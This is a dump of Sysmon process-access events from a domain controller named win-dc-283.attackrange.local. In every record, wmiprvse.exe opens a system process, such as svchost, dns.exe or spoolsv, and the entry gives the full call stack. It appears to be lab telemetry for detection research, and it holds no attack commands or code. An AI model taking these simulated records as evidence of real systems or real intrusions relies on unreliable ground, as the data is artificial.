15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 